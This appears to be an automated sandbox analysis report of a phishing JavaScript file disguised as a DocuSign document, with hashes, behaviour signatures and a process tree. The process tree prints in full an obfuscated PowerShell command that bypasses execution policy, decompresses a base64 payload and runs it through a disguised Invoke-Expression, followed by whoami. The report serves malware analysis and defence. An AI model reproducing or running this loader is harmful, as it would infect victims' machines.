Analysis

  • max time kernel
    70s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2023, 14:38

General

  • Target

    DocuSign-Feb01-2023.js

  • Size

    44KB

  • MD5

    fb10c8eb9f3346737b08d1d276467f7e

  • SHA1

    62480603ecd4b5e444d9ebf1fbb1ef7ddcbbef99

  • SHA256

    083d4184bc895d803048f375cb821d87f1f5acfa10b9d6057b3e9c9c1ed95d59

  • SHA512

    6734d8454b0355748321dcfc5a2916dce24c371e98cf925a0293daf21c075a99d4d286d2d00821e588c02349038d535bda6eb7c8b4f3aba92b5bbec8a8012e9f

  • SSDEEP

    768:yK0FmWhlhcVcmVs1JsFqk6TmnGT6ePuXSxjRhr:yK0F5hlhcVcauaok6Tg4uOX

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\DocuSign-Feb01-2023.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXecutIOnpoLIC bYPAsS "(nEw-OBJect sySteM.IO.CoMprESsIon.DeflAtesTREAM( [SYSTEm.IO.MEMorYSTrEAm][cONvErT]::fRomBase64STRIng( 'hVdrb+JKEv2eX9Gy2DEogUvAmCSjK10THAIbCM+85kZqAw1xAENsQ2BY//etKrsbckezG8kd049Tp55dZiyX1vbn0T4f7QuRlp0wXehnek/0s/UQXhZ6hqW1B0c71bp1Zzi34eUKHidoDLQMY+kf/eeVeAWMQoQwRUIyon0p0lj2humt63uA6dswBLsejM1caD+FOZyoujB4NRCRYd/ZtxgkjzhwFpiESKWJdGygo6O4L1z1bt2q3MH6xoJBXJntBtL9ESaUaB9SIsAbPXjuhfYiN7r3HpATnoGnm8hnxCAWD9gBLNl9Egrvp7pfpnfGQOO2/Xq0len1ZQ5239TnQs/Apu8JkEEmIQqoEFgVTRr6qPYI35rLMTLI9gA6+yD8wF16rHAyWXujEF9n3OqNKyyd2j+/8Vt7t47OUnubD37yf7c+ulGG7U+ANpssfdwzXLzz/jt/EZ+diP3J8t9Zal9pvsPUT5s/fkQsOw9hasdv+ZsArJx2zZcDL9Rw43DBG7zfeLE/P6LTU4kMfyD79pbbu0H0A+F4I2ygiI/oFWSA1N3bG7c5wOHy4r3PGy/cfuzAcna4BWKpveCDFz5rdfwoQ6ARjb4I177H0KS5Xz2PVtlYPoTcHVpoKmJHWME7uGKA5to4dwOxbN3tWObqSnN6I16vazltKvq9vs9d3ppqaDdU1n5eg+joYNdmy+E9LlYNvvxk+4RJ+jyXOzfZf4CO/i89s2f6Pn/1FOlIKP0tjrxCEuHkzq7jjZcLYFdLIinMIrGms2XnZoaBe7LvS9djuh6dpPZN3h0+dXs3/K47RPekVeIRmNWrVgBiRgHc2wWhWOQqu1D8eH1lf6Xz25I4y2+NghpMGEbwnF/KAafz+OMChnLyoywncNWUP84RQZ4z4jcI3JKRAaIDvvqwbD7eEstvX1gmJK3fskQRRl6iGiXii9AlhO70eXP1seWDWluZQHkddD+LzfAbcBNxi8i9NEFthBxKDmpKc+ot3odal/GtPJYL5YJaLeLPslw1R3KzOVbHLiQonTAu1QkyrqNOXMpj8T7xZaE8lPAGIZtyjrgkhMBIxXzm5FtaH43BAqn9R58vVp3tmk9XGD+PvG5P+Z2rvBJXt7hYLTysgO3G8hHrLFah0yPjYkbNcMP/MG7hUlFGp5UN4FNGn834ts6rm+Y/YhYxxwC5+gRhOVX/aUWfwsKyB4XOozqbydW9zXIm0hl2yvS/dRhT+886lI3aXR11W1U3Q343+yoCazwVg0BAXT9LdAQNMwhzUE/eWwsUZiWbaRsgjzqzDm/xVjeYInrqKJETJRZYjT/fljA68ZnB/eMLr/Du7ubY1rI0/b8oLV3IuKE8KNIbDWVp3BINOFekXB4q0xdkkJUovgz5VrqU+8yJQsEwKuZl4JlFuRrHNW42HJWEeSmDygftMybqbEnVlcPZC3mWQto0JZcDZzpLehA/khvP0bGi0o1UGErOhsrPmJ/Ci1EMdXaiMvBgg6I6O5bSDFUNDjLKlzKzSA9T5TGJJDsTctGQZeLIpiWpb3x2ouyiPEj8SmXFryDnDoWA/EFlOs53Q/G7/LIvtnPhqy8NeZZkmAd/mNJWRNxUVwEFV1xnlG7kc/PiiwzyVuxLFadlRTKODbLBiAZItfPMd7oUPhtza4MJAblr8nYjuro6ysCkxWH6jY+ZtKg4cSE6002DCsH0UAUow/jPis+fJ9QSQFP19TJ0u9gdUuu5sbrQbrrWEMa5uArgn1/WoORAU8rna1sjGufUbMU9RNJsDXfUPn5iXs/nyAYe34XJIyKzJ+5WHxbYVq35Y2POQUXSd81f+tPdP27AX2qeYsx01BBqHVa9X+od1iF+s9n9WroZ1W44GFdurF5xDZpavG9xUbGpbOmaLkvewUjJVdz7XSGiCKHyU6CKTldPSYZOAfOgMFELGCsF2izksWK8CjFwWURNtFTTr2z93gQ6mNSg/eHY1ac/UteTzXNGQ0WBJDDv8sqMjyq89lLpjpE8KlyivslMrojYV2TOOfpoDQ+0ZdQJj97g37jvBDNrhF1gS6AHBV6JWXsrRutQAJEBeif16Irp3AVjWP50vRAedrc1K4TmpWLX8F6ptVtV/lQdIA00niFpAJ9ydHx96CixDXE6wutgRUGD0ZMlCsRgTVwTgkBHS+Hl0vK6QU3D3gY6TWsLfXGisiE/hkpSCjpNjPtxOwuxiDjreawjKo6TwKLvu1PU9t4bCVAtVH4vHKItW3UouqnzDPFGzHbFSoQutrd1LxT+xpmrO7KgugCUhOkpeiuH7maXOlbXA7MGkOrHMNW171C3/FU+wsSHE7C+C3AIU3V2QbpoliiAg7cW7/JttTHqSIuoJD200PEXkfQxWJg8Tx+gYQgpFciYAPhbdzwWHrBdz0N3NRd1LwgdsFHAjrsPMo9Aqzp+nPdtPGzN58vPXuj4YX1y71WcEEzkiuAEVStGSjsgiMGAx8TURemwj3wzXtOnItIkioCJ/1vOQkDUrcb8oYINTNaKvzAgDyANriu1n5zSIItenQr8HOrcOnxLn2NSSZjs3Xpkrvfrj+jk5L8=') ,[systeM.Io.cOmpresSIoN.CompreSsiOnmODe]::dEcOmPrEsS ) |FOREACh { nEw-OBJect sYStEM.Io.StReaMReaDer( $_,[teXt.EncOdInG]::AsCiI) }| ForeAch { $_.ReAdtoEnd() } ) | &( $psHoME[21]+$pShOme[34]+'X')"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1808

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/1584-57-0x000007FEF34D0000-0x000007FEF3EF3000-memory.dmp

          Filesize

          10.1MB

        • memory/1584-58-0x000007FEF2330000-0x000007FEF2E8D000-memory.dmp

          Filesize

          11.4MB

        • memory/1584-60-0x00000000027D4000-0x00000000027D7000-memory.dmp

          Filesize

          12KB

        • memory/1584-59-0x000000001B7B0000-0x000000001BAAF000-memory.dmp

          Filesize

          3.0MB

        • memory/1584-62-0x00000000027D4000-0x00000000027D7000-memory.dmp

          Filesize

          12KB

        • memory/1584-63-0x00000000027DB000-0x00000000027FA000-memory.dmp

          Filesize

          124KB

        • memory/1992-54-0x000007FEFB8A1000-0x000007FEFB8A3000-memory.dmp

          Filesize

          8KB